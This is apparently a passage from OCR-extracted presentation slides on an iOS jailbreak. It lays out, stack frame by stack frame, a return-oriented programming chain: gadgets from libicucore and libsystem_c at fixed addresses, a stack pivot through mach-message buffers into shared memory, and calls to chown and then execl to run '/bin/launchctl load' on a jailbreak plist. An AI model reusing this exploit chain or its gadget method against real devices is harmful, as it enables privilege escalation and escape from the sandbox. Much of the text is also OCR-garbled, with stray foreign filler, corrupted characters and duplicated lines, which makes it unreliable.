SP + 0x08	service mach message	sbuf. data 0	MIG BAD ID
SP + 0x0C	service mach message	sbuf. data 4	???
$SP + 0 \times 10$	service mach message	sbuf. data 8	???
SP + 0x14	service mach message	sbuf. data c	???
SP + 0x18	service mach message	sbuf. data 10	???

#### GADGET\_ADD\_SP\_120\_POP8\_10\_4567

- The next gadget needs to jump across a significant portion of the stack from sbuf to rbuf, to get to more data we directly control
- From libicucore.A.dylib / uloc\_toLanguageTag+0x24B2

3660ae2e	b01e	add sp, #120	
3660ae30	e8bd0500	ldmia.w sp!, {r8, sl}	
3660ae34	bdf0	pop {r4, r5, r6, r7, pc	}

SP	Function	Label	Value
$SP + 0 \times 00$	service mach message	sbuf. NDR record t	???
SP + 0x04	service mach message	sbuf. NDR record t	???
SP + 0x08	service mach message	sbuf. data 0	MIG BAD ID
SP + 0x0C	service mach message	sbuf. data 4	???
$SP + 0 \times 10$	service mach message	sbuf. data 8	???
SP + 0x14	service mach message	sbuf. data c	???
$SP + 0 \times 18$	service mach message	sbuf. data 14	???
SP + 0x1C	service mach message	sbuf. data 18	???
SP + 0x20	service mach message	sbuf. data I c	???
SP + 0x24	service mach message	sbuf. data 20	???
SP + 0x28	service mach message	sbuf. data 24	???
SP + 0x2C	service mach message	sbuf. data 28	???
SP + 0x30	service mach message	sbuf. data 2c	
SP + 0x34	service mach message	sbuf. data 30	???
SP + 0x38	service mach message	sbuf. data 34	???
SP + 0x3C	service mach message	sbuf. data 38	
SP + 0x40	service mach message	sbuf. data 3c	
SP + 0x44	service mach message	sbuf. data 40	
SP + 0x48	service mach message	sbuf. data 44	???
SP + 0x60	service mach message	sbuf.msgh bits	???
SP + 0x64	service mach message	sbuf. msgh size	0×50
SP + 0x68	service mach message	sbuf.msgh remote port	racoon's port
SP + 0x6C	service mach message	sbuf.msgh local port	notifyd's port
SP + 0x70	service mach message	sbuf. msgh reserved	0
SP + 0x74	service mach message	sbuf. msgh_id	ADD_SP_120_POP8_10_4567 - 100
SP + 0x78	service mach message	sbuf. NDR record t	???
SP + 0x7C	service mach message	sbuf. NDR_record_t	???
SP + 0x80	service mach message	rbuf. data 0	aShmAddress
SP + 0x84	service mach message	rbuf. data 4	???
SP + 0x88	service mach message	rbuf. data 8	???
SP + 0x8C	service mach message	rbuf. data c	???
SP + 0x90	service mach message	rbuf. data 10	MOV_SP_R4_POP8_10_11_4567

SP	Function	Label	Value
SP - 0x94	service mach message	sbuf. NDR record t	???
SP - 0x90	service mach message	sbuf. NDR record t	???
SP - 0x8C	service mach message	sbuf. data 0	MIG BAD ID
SP - 0x88	service mach message	sbuf. data 4	???
SP - 0x84	service mach message	sbuf. data 8	???
SP - 0x80	service mach message	sbuf. data c	???
SP - 0x7C	service mach message	sbuf. data 14	???
SP - 0x78	service mach message	sbuf. data 18	???
SP - 0x74	service mach message	sbuf. data I c	???
SP - 0x70	service mach message	sbuf. data 20	???
SP - 0x6C	service mach message	sbuf. data 24	???
SP - 0x68	service mach message	sbuf. data 28	???
SP - 0x64	service mach message	sbuf. data 2c	
SP - 0x60	service mach message	sbuf. data 30	???
SP - 0x5C	service mach message	sbuf. data 34	???
SP - 0x58	service mach message	sbuf. data 38	
SP - 0x54	service mach message	sbuf. data 3c	
SP - 0x50	service mach message	sbuf. data 40	
SP - 0x4C	service mach message	sbuf. data 44	???
		•••	
SP - 0x34	service mach message	sbuf.msgh bits	???
SP - 0x30	service mach message	sbuf. msgh size	0×50
SP - 0x2C	service mach message	sbuf.msgh remote port	racoon's port
SP - 0x28	service mach message	sbuf.msgh local port	notifyd's port
SP - 0x24	service mach message	sbuf. msgh reserved	0
SP - 0x20	service mach message	sbuf. msgh id	ADD_SP_120_POP8_10_4567 - 100
SP - 0x1C	service mach message	r8	???
SP - 0x18	service mach message	s	???
SP - 0x14	service mach message	r4	aShmAddress
SP - 0x10	service mach message	r5	???
SP - 0x0C	service mach message	r6	???
SP - 0x08	service mach message	r7	???
SP - 0x04	service mach message	pc	MOV_SP_R4_POP8_10_11_4567

#### GADGET\_MOV\_SP\_R4\_POP8\_10\_11\_4567

- The next gadget pivots the stack to the notification center shared memory and continues execution from there.
- From libsystem\_c.dylib / pthread\_mutex\_lock+0x1B6

35e51c82 35e51c84 35e51c84	46a5 e8bd0d00	mo∨ ldmia.w	sp, r4 sp!, {r8, sl, fp}
35651088	вати	pop	{r4, r5, r6, r7, pc}
35e51c88		bob	{r4, r5, r6, r7, pc}

SP	Address	Label	Value
SP + 0x00	aShmAddress + 0x00		???
SP + 0x04	aShmAddress + 0x04		???
SP + 0x08	aShmAddress + 0x08		???
SP + 0x0C	aShmAddress + 0x0C		MOV_LR_R4_MOV_R0_LR_POP47
SP + 0x10	aShmAddress + 0x10		???
SP + 0x14	aShmAddress + 0x14		???
SP + 0x18	aShmAddress + 0x18		???
SP + 0x1C	aShmAddress + 0x1C		MOV_LR_R4_MOV_R0_LR_POP47
SP + 0x20	aShmAddress + 0x20		exit
SP + 0x24	aShmAddress + 0x24		???
SP + 0x28	aShmAddress + 0x28	a talàna an <del>talàna</del> an talàna dia	POP_R0123
SP + 0x2C	aShmAddress + 0x2C		aNotifydStringArg2Address
SP + 0x30	aShmAddress + 0x30		0×0
SP + 0x34	aShmAddress + 0x34		0×0
SP + 0x38	aShmAddress + 0x38		???
SP + 0x3C	aShmAddress + 0x3C		chown
SP + 0x40	aShmAddress + 0x40		
SP + 0x44	aShmAddress + 0x44		
SP + 0x48	aShmAddress + 0x48		POP_R0123
SP + 0x4C	aShmAddress + 0x4C		aShmAddress + 0x64
SP + 0x50	aShmAddress + 0x50		aShmAddress + 0x64
SP + 0x54	aShmAddress + 0x54		aShmAddress + 0x6F
SP + 0x58	aShmAddress + 0x58		aShmAddress + 0x74
SP + 0x5C	aShmAddress + 0x5C		execl
SP + 0x60	aShmAddress + 0x60		0×0
SP + 0x64	aShmAddress + 0x64		/bin/launchctl
SP + 0x6F	aShmAddress + 0x6F		load
SP + 0x74	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist

SP	Address	Label	Value
SP - 0x20	aShmAddress + 0x00	r8	???
SP - 0xIC	aShmAddress + 0x04	S	???
SP - 0x18	aShmAddress + 0x08	fp	???
SP - 0x14	aShmAddress + 0x0C	r4	MOV_LR_R4_MOV_R0_LR_POP47
SP - 0x10	aShmAddress + 0x10	r5	???
SP - 0x0C	aShmAddress + 0x14	<b>r6</b>	???
SP - 0x08	aShmAddress + 0x18	r7	???
SP - 0x04	aShmAddress + 0x1C	pc	MOV_LR_R4_MOV_R0_LR_POP47
SP + 0x00	aShmAddress + 0x20		exit
SP + 0x04	aShmAddress + 0x24		???
SP + 0x08	aShmAddress + 0x28		POP_R0123
SP + 0x0C	aShmAddress + 0x2C		aNotifydStringArg2Address
SP + 0×10	aShmAddress + 0x30		0×0
SP + 0x14	aShmAddress + 0x34		0×0
SP + 0x18	aShmAddress + 0x38		
SP + 0x1C	aShmAddress + 0x3C		chown
SP + 0x20	aShmAddress + 0x40		
SP + 0x24	aShmAddress + 0x44		
SP + 0x28	aShmAddress + 0x48		POP_R0123
SP + 0x2C	aShmAddress + 0x4C		aShmAddress + 0x64
SP + 0x30	aShmAddress + 0x50		aShmAddress + 0x64
SP + 0x34	aShmAddress + 0x54		aShmAddress + 0x6F
SP + 0x38	aShmAddress + 0x58		aShmAddress + 0x74
SP + 0x3C	aShmAddress + 0x5C	Alexine of a state of the second state of the	execl
SP + 0x40	aShmAddress + 0x60		0×0
SP + 0x44	aShmAddress + 0x64		/bin/launchctl
SP + 0x48	aShmAddress + 0x6F		load
SP + 0x4C	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist

SP	Address	Label	Value
SP + 0x00	aShmAddress + 0x20		exit
SP + 0x04	aShmAddress + 0x24		???
SP + 0x08	aShmAddress + 0x28		POP_R0123
SP + 0x0C	aShmAddress + 0x2C		aNotifydStringArg2Address
SP + 0x10	aShmAddress + 0x30		0×0
SP + 0x14	aShmAddress + 0x34		0×0
SP + 0x18	aShmAddress + 0x38		???
SP + 0xIC	aShmAddress + 0x3C		chown
SP + 0x20	aShmAddress + 0x40		???
SP + 0x24	aShmAddress + 0x44		???
SP + 0x28	aShmAddress + 0x48		POP_R0123
SP + 0x2C	aShmAddress + 0x4C		aShmAddress + 0x64
SP + 0x30	aShmAddress + 0x50		aShmAddress + 0x64
SP + 0x34	aShmAddress + 0x54		aShmAddress + 0x6F
SP + 0x38	aShmAddress + 0x58		aShmAddress + 0x74
SP + 0x3C	aShmAddress + 0x5C		execl
SP + 0x40	aShmAddress + 0x60	ditta en anticada	
SP + 0x44	aShmAddress + 0x64		/bin/launchctl
SP + 0x48	aShmAddress + 0x6F		load
SP + 0x4C	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist
	RO		???

R0	
RI	???
R2	???
R3	······································
R4	MOV_LR_R4_MOV_R0_LR_POP47
LR	???
PC	MOV_LR_R4_MOV_R0_LR_POP47

SP	Address	Label	Value
SP - 0x0C	aShmAddress + 0x20	r4	exit
SP - 0x08	aShmAddress + 0x24	r7	???
SP - 0x04	aShmAddress + 0x28	рс	POP_R0123
$SP + 0 \times 00$	aShmAddress + 0x2C		aNotifydStringArg2Address
$SP + 0 \times 04$	aShmAddress + 0x30		0×0
SP + 0x08	aShmAddress + 0x34		0×0
SP + 0x0C	aShmAddress + 0x38		???
$SP + 0 \times 10$	aShmAddress + 0x3C		chown
$SP + 0 \times 14$	aShmAddress + 0x40		???
SP + 0x18	aShmAddress + 0x44		???
SP + 0xIC	aShmAddress + 0x48		POP_R0123
SP + 0x20	aShmAddress + 0x4C		aShmAddress + 0x64
SP + 0x24	aShmAddress + 0x50		aShmAddress + 0x64
SP + 0x28	aShmAddress + 0x54		aShmAddress + 0x6F
SP + 0x2C	aShmAddress + 0x58		aShmAddress + 0x74
SP + 0x30	aShmAddress + 0x5C		execl
SP + 0x34	aShmAddress + 0x60		
SP + 0x38	aShmAddress + 0x64	and in the second states in	/bin/launchctl
SP + 0x3C	aShmAddress + 0x6F	· 선생님 전에 가지 가지 가지 않는 것은 것이 있다. 이 가지 않는 것이 가지 않는 것이 있다. 것이 가지 않는 것이 있다. 것이 있다. 이 가지 않는 것이 없다. 이 가지 않는 것이 있다. 이 가지 않는 것이 없다. 이 가지 않는 것이 없다. 이 가지 않는 것이 있다. 이 가지 않는 것이 있다. 이 가지 않는 것이 없다. 이 가지 않는 것이 있다. 이 가지 않는 것이 없다. 이 가지 않는 것이 없다. 이 가지 않는 것이 있다. 이 가지 않는 것이 없다. 이 가지 않는 것이 이 같이 없다. 이 같이 없다. 이 같이 없다. 이 있다. 이 있 않다. 이 있 않다. 이 있다. 이 있다. 이 있다. 이 있다. 이 있 않다. 이 있다. 이 있 않다. 이 있다. 이 있다. 이 있 않다. 이 있 않 이 있 않다. 이 있 않다. 이 있 있 않다. 이 있 않다. 이 있 않는 것 않는 것 않는 것 않다. 이 있 않는 것 않다. 이 있 않는 않 않 않 않다. 이 있 않는 않다. 이 있 않다. 이 있 않다. 이 있 않 않다. 이 있 않다. 이 있 않 않다. 않다. 이 있 않 않다. 이 있 않 않다. 않 않는	load
SP + 0x40	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist

R0	MOV_LR_R4_MOV_R0_LR_POP47
RI	???
R2	???
R3	
R4	exit
LR	MOV_LR_R4_MOV_R0_LR_POP47
PC	POP_R0123

SP	Address	Label	Value
SP - 0x14	aShmAddress + 0x2C	r0	aNotifydStringArg2Address
SP - 0x10	aShmAddress + 0x30	rl	0×0
SP - 0x0C	aShmAddress + 0x34	r2	0×0
SP - 0x08	aShmAddress + 0x38	r3	???
SP - 0x04	aShmAddress + 0x3C	рС	chown
SP + 0x00	aShmAddress + 0x40		???
SP + 0x04	aShmAddress + 0x44		???
SP + 0x08	aShmAddress + 0x48		POP_R0123
SP + 0x0C	aShmAddress + 0x4C		aShmAddress + 0x64
SP + 0x10	aShmAddress + 0x50		aShmAddress + 0x64
SP + 0x14	aShmAddress + 0x54		aShmAddress + 0x6F
SP + 0x18	aShmAddress + 0x58		aShmAddress + 0x74
SP + 0xIC	aShmAddress + 0x5C		execl
SP + 0x20	aShmAddress + 0x60		0x0
SP + 0x24	aShmAddress + 0x64		/bin/launchctl
SP + 0x28	aShmAddress + 0x6F		load
SP + 0x2C	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist
	فالمغابطة أباريت ومعجوب والأنصب والطلا		
	사람이 있는 것을 가지 않는 것을 가지 않는 것이 있는 것을 가지 않는 것을 가지 않는다. 같은 것은		성 - 이 이상에 걸려진 가슴을 가는 것이 있는 것이 있는 것이 있는 것이 있는 것이 있는 것이 있다. - 도망에 이는 것이 되는 것이 같은 것이 있는 것이 있는 것이 것은 것이 있는 것이 있는 것이 없는 것이 없는 것이 같이 있는 것이 있

R0	aNotifydStringArg2Address
RI	
R2	0
R3	
R4	exit
LR	MOV_LR_R4_MOV_R0_LR_POP47
PC	chown

SP	Address	Label	Value
SP + 0x00	aShmAddress + 0x40		???
SP + 0x04	aShmAddress + 0x44		???
SP + 0x08	aShmAddress + 0x48		POP_R0123
SP + 0x0C	aShmAddress + 0x4C		aShmAddress + 0x64
SP + 0x10	aShmAddress + 0x50		aShmAddress + 0x64
SP + 0x14	aShmAddress + 0x54		aShmAddress + 0x6F
SP + 0x18	aShmAddress + 0x58		aShmAddress + 0x74
SP + 0x1C	aShmAddress + 0x5C		execl
SP + 0x20	aShmAddress + 0x60		0×0
SP + 0x24	aShmAddress + 0x64		/bin/launchctl
SP + 0x28	aShmAddress + 0x6F		load
SP + 0x2C	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist
		a distribute de la distriction de	a i na dana i Tini i na da da dia dia da
	ha	and shake a shekara a	- North Contraction - and the anti-the orthographic states
n an tha an t Tha an tha an t	1987년 1997년 2월 1997년 2월 1997년 1986년 1988년 1988년 1997년 - 1997년 1		이 같은 것은 것 같은 것은 것은 것은 것은 것은 것이 있다. 것이 있는 것이 있는 것이 같은 것은 것이 같은 것은 것이 같은 것은 것이 같은 것이 같은 것이 같은 것이 있다. 가지 않는 것이 있는 것이 같은 것이 있다. 가지 않는 것이 있는 것이 있다. 가지 않는 것이 있는 것이 없는 것이 있는 것이 없는 것이 없는 것이 있는 것이 없는 것이 없는 것이 없는 것이 없는 것이 있는 것이 없는 것이 없는 것이 없는 것이 없는 것이 없는 것이 없는 것이 있는 것이 없는 것이 없는 것이 없는 것이 있는 것이 없는 것이 없 않는 것이 없는 것이 않은 것이 않은 것이 않은 것이 없는 것이 않은 것이 않이 않은 것이 없는 것이 않이

R0	
RI	
R2	
R3	
R4	exit
LR	······································
PC	MOV_LR_R4_MOV_R0_LR_POP47

SP	Address	Label	Value
SP - 0x0C	aShmAddress + 0x40	r4	???
SP - 0x08	aShmAddress + 0x44	r7	???
SP - 0x04	aShmAddress + 0x48	PC	POP_R0123
SP + 0x00	aShmAddress + 0x4C		aShmAddress + 0x64
SP + 0x04	aShmAddress + 0x50		aShmAddress + 0x64
SP + 0x08	aShmAddress + 0x54		aShmAddress + 0x6F
SP + 0x0C	aShmAddress + 0x58		aShmAddress + 0x74
SP + 0x10	aShmAddress + 0x5C		execl
SP + 0x14	aShmAddress + 0x60		0x0
SP + 0x18	aShmAddress + 0x64		/bin/launchctl
SP + 0x1C	aShmAddress + 0x6F		load
SP + 0x20	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist
		a disting a second second	
	والمعادية والمعادية والمحمد والمتحمد والمتحمد والمتعاد	- Andrea Angelan - Alberta	
신화 전에 가지 않는 것은 가지 않는 것을 했다. 같은 것 같은 것은 것은 것은 것은 것을 같이 없다.			방법이 해외했다. 이번 바람이 가지 않는 것은 것에서 가지 않는 것이 있는 것이 있다. 

R0	exit
RI	???
R2	???
R3	······································
R4	
LR	exit
PC	POP_R0123

SP	Address	Label	Value
SP - 0×14	aShmAddress + 0x4C	r0	aShmAddress + 0x64
SP - 0×10	aShmAddress + 0x50	rl	aShmAddress + 0x64
SP - 0x0C	aShmAddress + 0x54	r2	aShmAddress + 0x6F
SP - 0x08	aShmAddress + 0x58	r3	aShmAddress + 0x74
SP - 0x04	aShmAddress + 0x5C	рс	execl
$SP + 0 \times 00$	aShmAddress + 0x60		0x0
SP + 0x04	aShmAddress + 0x64		/bin/launchctl
$SP + 0 \times 08$	aShmAddress + 0x6F		load
SP + 0x0C	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist
		a da de ser de la deservición de la de	
	ales - Jennie - Jenni	s section section of the sec	
전 성상에게 이 것이지 않는 것이 한 것을 했다. 같은 것이 아파 이 것이 있는 것이 같이 있다.		가가 한 것도 한 가가가 한 것이 적인다. " "1991년 1월 1992년 1월 1992년 - 1992년 - 1992년 1월 1992년 1월 1992년 1월 1992년 1월 1992년 1월 1992년	에 있는 것은 것은 가장은 가장을 가지 않는 것은 것이 있다. 이상은 것은 것을 통해 방법을 얻는 것 같은 것은

RO	aShmAddress + 0x64
RI	aShmAddress + 0x64
R2	aShmAddress + 0x6F
R3	aShmAddress + 0x74
R4	???
LR	exit
PC	execl

SP	Address	Label	Value
SP + 0x00	aShmAddress + 0x60		0x0
SP + 0x04	aShmAddress + 0x64		/bin/launchctl
SP + 0x08	aShmAddress + 0x6F		load
SP + 0x0C	aShmAddress + 0x74		/private/var/mobile/Media/corona/jb.plist
a hall have been a sub-		a made a construction of the second	

#### Hopefully will never get here

R0	
RI	
R2	???
R3	
R4	???
LR	???
PC	exit

#### Questions?

- More sandbox info can be found in Dionysus Blazakis's presentation:
  - <u>http://www.semantiscope.com/research/</u>
     <u>BHDC2011/BHDC2011-Slides.pdf</u>
  - <u>https://github.com/dionthegod/</u> <u>XNUSandbox</u>